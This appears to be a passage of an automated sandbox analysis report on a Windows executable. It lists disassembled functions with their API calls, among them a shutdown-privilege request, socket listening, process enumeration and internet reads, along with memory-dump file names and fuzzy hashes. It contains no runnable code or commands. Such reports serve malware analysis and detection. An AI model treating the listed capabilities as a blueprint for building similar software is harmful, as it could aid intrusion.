                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                    • String ID: NULL Pointer assignment
                                    • API String ID: 1300414916-2785691316
                                    • Opcode ID: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                    • Instruction ID: a256952599308d79ee1b72802870b987562f9fb52245d650be862a561662669d
                                    • Opcode Fuzzy Hash: de721af04d4148b496740198d0c26322ac1cb4de14ffdc2e87a0a645c3be8779
                                    • Instruction Fuzzy Hash: 33914DB1D00219ABDB10DFA4DC91FEEBBB9EF44710F10815AF515A7291DB70AA45CFA0
                                    Function 009F0133 Relevance: 10.7, APIs: 7, Instructions: 245windownativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • GetSystemMetrics.USER32(0000000F), ref: 009F016D
                                    • MoveWindow.USER32(00000003,?,00000000,00000001,00000000,00000000,?,?,?), ref: 009F038D
                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 009F03AB
                                    • InvalidateRect.USER32(?,00000000,00000001,?), ref: 009F03D6
                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 009F03FF
                                    • ShowWindow.USER32(00000003,00000000), ref: 009F0421
                                    • NtdllDialogWndProc_W.USER32(?,00000005,?,?), ref: 009F0440
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$MessageSend$DialogInvalidateLongMetricsMoveNtdllProc_RectShowSystem
                                    • String ID:
                                    • API String ID: 2922825909-0
                                    • Opcode ID: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                    • Instruction ID: 870bff5ad7d396cfcf0dc806e510c46153854778e8aa92b245e75b9cf895f7f3
                                    • Opcode Fuzzy Hash: ea6b5eb1631e1079ec4f35cf3c603381a6eb7d1dfaadb1844aa95c35e67fad94
                                    • Instruction Fuzzy Hash: 2EA1DF3560061AEFDB18CF68C9857FDBBB9BF88700F048115EE58A7291E774AD61CB90
                                    Function 009C79D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009BB134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
                                      • Part of subcall function 009BB134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 009BB1AD
                                      • Part of subcall function 009BB134: GetLastError.KERNEL32 ref: 009BB1BA
                                    • ExitWindowsEx.USER32(?,00000000), ref: 009C7A0F
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                    • String ID: $@$SeShutdownPrivilege
                                    • API String ID: 2234035333-194228
                                    • Opcode ID: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                    • Instruction ID: 9d8a8e8e49ab33002ccdefe6dda3ed9ee2301d731b5cc3ebb08dcd2c8c000b9f
                                    • Opcode Fuzzy Hash: 536fcabbc723ae04b8afed5e0986fc00723bdd56d15b5afd6129665408c6bdbd
                                    • Instruction Fuzzy Hash: 4A01A772E582156AF72C66F8DC5AFBFB25C9B04750F141C2CFD53A20D2D5A49E0189B2
                                    Function 009D8C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                    Download Yara Rule
                                    APIs
                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 009D8CA8
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8CB7
                                    • bind.WSOCK32(00000000,?,00000010), ref: 009D8CD3
                                    • listen.WSOCK32(00000000,00000005), ref: 009D8CE2
                                    • WSAGetLastError.WSOCK32(00000000), ref: 009D8CFC
                                    • closesocket.WSOCK32(00000000,00000000), ref: 009D8D10
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLast$bindclosesocketlistensocket
                                    • String ID:
                                    • API String ID: 1279440585-0
                                    • Opcode ID: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                    • Instruction ID: 05fed89f2c06e2370de31233ba316a9d9311d968c7fa5ae1ce5b7d466845e3a1
                                    • Opcode Fuzzy Hash: e302c04855cdc2d18b486ebf56113aaf5c25bbf8c420d46d80ec9ca3b01f1f03
                                    • Instruction Fuzzy Hash: 2121A372600204EFCB10EFA8CD45B6EB7A9EF88714F148559F956A73D2CB70AD42CB61
                                    Function 009C6532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 009C6554
                                    • Process32FirstW.KERNEL32(00000000,0000022C), ref: 009C6564
                                    • Process32NextW.KERNEL32(00000000,0000022C), ref: 009C6583
                                    • __wsplitpath.LIBCMT ref: 009C65A7
                                    • _wcscat.LIBCMT ref: 009C65BA
                                    • CloseHandle.KERNEL32(00000000,?,00000000), ref: 009C65F9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                    • String ID:
                                    • API String ID: 1605983538-0
                                    • Opcode ID: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                    • Instruction ID: badf1b2a0c68fff2935bbda99ac17583badb0f099fccaa8e63079f1a7a80a860
                                    • Opcode Fuzzy Hash: c37b9ac452bb42035f03e978ae19fa4278e9829ccffc863bb5983e9f536bc87a
                                    • Instruction Fuzzy Hash: 9D216571D00258ABDB10EBA4CD89FDDB7BCAB49300F5004A9F545E7141DB759F85CBA2
                                    Function 009D923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 009DA82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 009DA84E
                                    • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 009D9296
                                    • WSAGetLastError.WSOCK32(00000000,00000000), ref: 009D92B9
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorLastinet_addrsocket
                                    • String ID:
                                    • API String ID: 4170576061-0
                                    • Opcode ID: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
                                    • Instruction ID: 771fa28d72070523e1680dbec2e050a728fdfbe57307ea47181d8f097940e874
                                    • Opcode Fuzzy Hash: c300bea4e2389986247adeefdff0603ca79dd75dbc43d74ef4f4d78668ffa7be
                                    • Instruction Fuzzy Hash: 5F41AE71600204AFDB14BB68CC82F7E77EDEF84728F148449F956AB392DA749D028B91
                                    Function 009CEB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • FindFirstFileW.KERNEL32(?,?), ref: 009CEB8A
                                    • _wcscmp.LIBCMT ref: 009CEBBA
                                    • _wcscmp.LIBCMT ref: 009CEBCF
                                    • FindNextFileW.KERNEL32(00000000,?), ref: 009CEBE0
                                    • FindClose.KERNEL32(00000000,00000001,00000000), ref: 009CEC0E
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Find$File_wcscmp$CloseFirstNext
                                    • String ID:
                                    • API String ID: 2387731787-0
                                    • Opcode ID: a6843325b70124bb656375e33b17f8122f5e8c740c7dbf024f3c90fbadc2a121
                                    • Instruction ID: 871bd9e65fe3259e14a0e87c76a288f6d0522bcfa891ffd89df18a948ae6999b
                                    • Opcode Fuzzy Hash: a6843325b70124bb656375e33b17f8122f5e8c740c7dbf024f3c90fbadc2a121
                                    • Instruction Fuzzy Hash: 5B419075A046019FCB08DF68C491FA9B7E8FF89324F10455DF95A8B3A1DB31E941CB92
                                    Function 009E8111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                    • String ID:
                                    • API String ID: 292994002-0
                                    • Opcode ID: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
                                    • Instruction ID: bc45ab10fddfb9ab752836a2167f6c38950a48288aae0fc26ea3264da7eff6ed
                                    • Opcode Fuzzy Hash: c5ad20497cd6a2e696a5a64da754b0b2b7dfc53fa74298863a61749a15a5b853
                                    • Instruction Fuzzy Hash: B5119D327042546FE7226FAADC44B6FBB9CEF84760B050429F84AD7281DF30ED0386A4
                                    Function 00989B60 Relevance: 7.3, Strings: 5, Instructions: 1055COMMON
                                    Download Yara Rule
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID: ERCP$VUUU$VUUU$VUUU$VUUU
                                    • API String ID: 0-1546025612
                                    • Opcode ID: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
                                    • Instruction ID: 959dd899b483742326112b514e45fe2be009fc00e5dde4bea0682cf4dba4a18b
                                    • Opcode Fuzzy Hash: f5724729d5a52bf795f744eea8b682e295c60e778857d7ee0f2af473dc3427a1
                                    • Instruction Fuzzy Hash: 3492A071E0021ACBEF24DF58D9807BDB7B1BB54314F1886AAE816AB380D7759D81CF91
                                    Function 0099E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,0099E014,75920AE0,0099DEF1,00A1DC38,?,?), ref: 0099E02C
                                    • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0099E03E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: AddressLibraryLoadProc
                                    • String ID: GetNativeSystemInfo$kernel32.dll
                                    • API String ID: 2574300362-192647395
                                    • Opcode ID: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
                                    • Instruction ID: 20ddedc2f1f2797698c99358655e8380c9ae7b1221c3310d452756bd2b99d16c
                                    • Opcode Fuzzy Hash: 94207c3a3dd7b95829e4a21ea1a3e605c1d1ae6fa4e97c0f4e084e9d5f12bcc6
                                    • Instruction Fuzzy Hash: E1D0C771504716AFDB31DFE5EC09762BAD9BB08711F288919F495D2150FBB4D8828750
                                    Function 009EF1D7 Relevance: 6.1, APIs: 4, Instructions: 80nativewindowCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • GetCursorPos.USER32(?), ref: 009EF211
                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,009FE4C0,?,?,?,?,?), ref: 009EF226
                                    • GetCursorPos.USER32(?), ref: 009EF270
                                    • NtdllDialogWndProc_W.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,009FE4C0,?,?,?), ref: 009EF2A6
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Cursor$DialogLongMenuNtdllPopupProc_TrackWindow
                                    • String ID:
                                    • API String ID: 1423138444-0
                                    • Opcode ID: 5d686267100d5db8431bf0578860acb661fd95a0180f1e9d0c68776afd1df4d9
                                    • Instruction ID: e85f05f03a2b8b6e5b559ee0c56a4c30317a0a4f54f451558637eac4f04e100f
                                    • Opcode Fuzzy Hash: 5d686267100d5db8431bf0578860acb661fd95a0180f1e9d0c68776afd1df4d9
                                    • Instruction Fuzzy Hash: 7F219E39600018AFCB16CF99DC68EEABBB9EB4A310F04406AFA154B2A1D3359D52DB50
                                    Function 0099B55D Relevance: 6.1, APIs: 4, Instructions: 56nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,00000020,?,00000000), ref: 0099B5A5
                                    • GetClientRect.USER32(?,?), ref: 009FE69A
                                    • GetCursorPos.USER32(?), ref: 009FE6A4
                                    • ScreenToClient.USER32(?,?), ref: 009FE6AF
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Client$CursorDialogLongNtdllProc_RectScreenWindow
                                    • String ID:
                                    • API String ID: 1010295502-0
                                    • Opcode ID: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
                                    • Instruction ID: 8d5bd707d78c8beade0e9fcd8ef7a241bb451f7eea54f7da34948f984c3f9ed7
                                    • Opcode Fuzzy Hash: 88ee13d0e4bff4e522bbb5c71c1b0444a3db0db6971eac334aeb63d8e96b0453
                                    • Instruction Fuzzy Hash: 5F11363690002EBFCF10DF98DD459AE77B9EF49305F410455F905E7150D738AA92CBA2
                                    Function 009C13CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                    Download Yara Rule
                                    APIs
                                    • lstrlenW.KERNEL32(?,?,?,00000000), ref: 009C13DC
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: lstrlen
                                    • String ID: ($|
                                    • API String ID: 1659193697-1631851259
                                    • Opcode ID: 7cfc07b630bac23c8bea979ef15bc4ff107f683f8652deb1d42c5021765b119b
                                    • Instruction ID: 0e34f000f68fc2de87e9f4f442c4ff19ce511cec22bc52e289b0dec536c55e78
                                    • Opcode Fuzzy Hash: 7cfc07b630bac23c8bea979ef15bc4ff107f683f8652deb1d42c5021765b119b
                                    • Instruction Fuzzy Hash: 2D322475A006059FCB28CF69C490E6AB7F4FF49320B11C56EE49ADB3A2E770E941CB44
                                    Function 0099B11F Relevance: 4.9, APIs: 3, Instructions: 377nativeCOMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099B34E: GetWindowLongW.USER32(?,000000EB), ref: 0099B35F
                                    • NtdllDialogWndProc_W.USER32(?,?,?,?,?), ref: 0099B22F
                                      • Part of subcall function 0099B55D: NtdllDialogWndProc_W.USER32(?,00000020,?,00000000), ref: 0099B5A5
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: DialogNtdllProc_$LongWindow
                                    • String ID:
                                    • API String ID: 1155049231-0
                                    • Opcode ID: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
                                    • Instruction ID: 83e1345aacf114a487886dfec89c943ba93cf3e67d80b94439f66c892c9d875b
                                    • Opcode Fuzzy Hash: 1bf16a31692855dc2bc7c3f1e6289f2589a65e9ef545a62b39f3052f80d53ef3
                                    • Instruction Fuzzy Hash: 10A18870118008BADF38AF6E6E99E7F395EEBEA750B10491EF511D21A5CB2D9C019372
                                    Function 009D4EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                    Download Yara Rule
                                    APIs
                                    • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009D43BF,00000000), ref: 009D4FA6
                                    • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 009D4FD2
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: Internet$AvailableDataFileQueryRead
                                    • String ID:
                                    • API String ID: 599397726-0
                                    • Opcode ID: b069700c064c04a7422764cd7103f90ff2266c01c1da8e9f152c6d969cfbe8bd
                                    • Instruction ID: a862ce0e97cf5b84e3ec3beb9150fc6d3678f85d32d3c4cade5f22c22ae36f18
                                    • Opcode Fuzzy Hash: b069700c064c04a7422764cd7103f90ff2266c01c1da8e9f152c6d969cfbe8bd
                                    • Instruction Fuzzy Hash: A041E771584209BFEB20DF98CD81FBFB7BCEB80754F10842BF205A6290DA719E4197A0
                                    Function 009CE1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                    Download Yara Rule
                                    APIs
                                    • SetErrorMode.KERNEL32(00000001), ref: 009CE20D
                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 009CE267
                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 009CE2B4
                                    Memory Dump Source
                                    • Source File: 00000000.00000002.2050034358.0000000000981000.00000020.00000001.01000000.00000003.sdmp, Offset: 00980000, based on PE: true
                                    • Associated: 00000000.00000002.2050008624.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A0D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050090273.0000000000A2E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050172657.0000000000A3A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                    • Associated: 00000000.00000002.2050216485.0000000000A44000.00000002.00000001.01000000.00000003.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_0_2_980000_RHOqJ5BrHW.jbxd
                                    Similarity
                                    • API ID: ErrorMode$DiskFreeSpace
                                    • String ID:
                                    • API String ID: 1682464887-0
                                    • Opcode ID: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
                                    • Instruction ID: 562d317aa0328a7fc19922901a3ec4206cf230488a560ac73c428f144a6d550d
                                    • Opcode Fuzzy Hash: b20b052a7a4707468dbe0b8f76c3f047320d9a9da0c490591c014f238ce8db61
                                    • Instruction Fuzzy Hash: 09213E75A00218EFCB00EFA5D885FADFBB8FF88314F0484A9E945A7351DB319906CB50
                                    Function 009BB134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0099F4EA: std::exception::exception.LIBCMT ref: 0099F51E
                                      • Part of subcall function 0099F4EA: __CxxThrowException@8.LIBCMT ref: 0099F533
                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 009BB180
